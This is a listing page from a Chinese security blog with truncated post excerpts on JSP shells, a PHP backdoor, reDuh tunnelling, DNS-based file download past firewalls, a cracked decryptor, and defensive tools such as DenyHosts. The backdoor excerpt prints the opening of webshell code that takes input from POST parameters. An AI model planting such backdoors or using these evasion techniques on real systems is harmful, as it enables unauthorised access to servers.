最新消息:

工具

hacking-with-jsp-shells

hacking-with-jsp-shells

admin 5年前 (2014-06-07) 1875浏览 1评论

Most enterprise datacenters today house at least a few web servers that support Java Server Pages (JSP). In my experience, at...

又一款超强PHP后门

又一款超强PHP后门

admin 5年前 (2014-05-25) 778浏览 0评论

这个后门是在渗透某站时遇到的,贴代码: <?php $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST[&quo...

win7 能用的ntsd.exe,超强结束进程

win7 能用的ntsd.exe,超强结束进程

admin 5年前 (2014-05-11) 2881浏览 0评论

NTSD的功能非常的强大,用它强行结束某个比较顽固的进程还是很好用的,基本上除了WINDOWS系统自己的管理进程,ntsd几乎都可以杀掉。 解压放到/windows/system32下,然后在cmd下,就可以进行操作了。 命令格式:ntsd -c q...

绿盟科技分析报告:DDoS兵器谱2014Q1版

绿盟科技分析报告:DDoS兵器谱2014Q1版

admin 5年前 (2014-05-11) 1162浏览 0评论

网络攻防是发生在第五空间的对抗和战争。这是一个动态的过程,无论攻击者还是防御者都在实战中寻求进步。攻防双方的“兵器”就在这个战场中不断磨砺和进化。绿盟科技关注攻防的最新进展,为了帮助客户更好的对抗网络威胁,每个季度会推出最新的“DDoS兵器谱” ,介...

Windows下curl使用

Windows下curl使用

admin 5年前 (2014-05-03) 1355浏览 0评论

Windows下默认没有curl命令,需要安装后才能使用。 1.      到这里下载http://curl.haxx.se/download/文件curl-7.17.1-win32-ssl.zip,如果不需要使用ssl的话,可以直接下载curl-7...

黑暗搜索引擎Shodan Chrome插件

黑暗搜索引擎Shodan Chrome插件

admin 5年前 (2014-04-28) 961浏览 0评论

今天小编为各位推荐的是Shodan Chrome插件,它可以自动探测网站所属的国家、城市,谁是这个网站IP的主人以及其开放的服务和端口,包括FTP、DNS、SSH或者其他非主流服务。可谓渗透测试工程师居家旅行、杀人越货必备良药:) FreeBuf科...

给你的 Linux 桌面披上 Windows 8 的外衣

给你的 Linux 桌面披上 Windows 8 的外衣

admin 5年前 (2014-04-28) 924浏览 0评论

*开发者已经完成了新的仿Windows 7/8 的LXDE美化包,并且支持了呼声很高的Arch Linux。 * 不管你喜不喜欢,还是有很多人乐意把他们的系统美化成Windows 7或者Windows 8的界面。开发者制作了一个美化包能让这些用户安...

iDezender 8.1 Pro 破解版

iDezender 8.1 Pro 破解版

admin 5年前 (2014-04-28) 4540浏览 0评论

可解ioncube及Zend加密,支持批量。 将要解密的文件放入Encoded目录,打开iDezender选择相应的解密类型,回车后开始解密。 解密后的文件移放在Decoded目录,高清无码图如下。 点我下载 ps:百度网盘已转存 转自:http...

Whois查询原理与python实现

Whois查询原理与python实现

admin 5年前 (2014-04-26) 4012浏览 1评论

RFC812定义了一个非常简单的Internet信息查询协议——WHOIS协议。其基本内容是,先向服务器的TCP端口43建立一个连接,发送查询关 键字并加上回车换行,然后接收服务器的查询结果。 世界上各级Internet管理机构秉承公开、公正、共享的...

内网渗透利器--reDuh(http/https隧道)使用

内网渗透利器–reDuh(http/https隧道)使用

admin 5年前 (2014-04-21) 3931浏览 0评论

一、使用说明 国外大牛的作品,偶顺手写了个使用说明。E文好的看原文  http://www.sensepost.com/research/reDuh/ 这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服...

搜狗输入法Linux版1.0正式发布

搜狗输入法Linux版1.0正式发布

admin 5年前 (2014-04-21) 757浏览 0评论

由国内Linux系统团队Ubuntu Kylin与搜狗联合开发的搜狗输入法Linux版发布。该版本基于开源小企鹅输入法框架(Fcitx)、开源Qimpanel面板以及搜狗输入法引擎,将免费提供给所有开源Linux发行版和个人用户免费使用。 由国内Li...

windows 上使用wget

windows 上使用wget

admin 5年前 (2014-04-13) 991浏览 0评论

我们都知道wget这个工具是Linux、Unix下才能使用的。那么windows平台下到底可否使用?答案是确定的可以的!!! 请从下面链接下载wget(1.11.4) for win: http://users.ugent.be/~bpuype/wg...

通过dns进行文件下载

通过dns进行文件下载

admin 5年前 (2014-04-13) 981浏览 0评论

0x00 背景 偶尔会遇到这样的情况,防火墙规则极大的限制外网的访问(这种情况经常是一个白名单来处理,仅仅允许少量的主机和外网产生连接)想要下载一下二进制文件到目标主机上,就会很麻烦。 我们来假设这样的一个情景:你已经拥有在上述情况下的主机、需要和...

服务器文件批量下载工具:Web Cloner v0.1

服务器文件批量下载工具:Web Cloner v0.1

admin 5年前 (2014-03-31) 989浏览 0评论

Web Cloner [掠食者] 用来在服务器端无法使用系统命令和ZIP库文件的情况下, 批量下载服务器上的文件。待完善的功能包括多语言支持, 下载频度控制, Server代码动态切换, 多文件合并下载。 Options: -s: Webs...

阻止SSH暴力破解 DenyHosts

阻止SSH暴力破解 DenyHosts

admin 5年前 (2014-03-27) 792浏览 0评论

DenyHosts是Python语言写的一个程序,它会分析SSHD的日志文件,当发现重复的攻击时就会记录IP到/etc/hosts.deny文 件,从而达到自动屏蔽IP的功能。 授权协议: GPL 开发语言: Python 操作系统: Lin...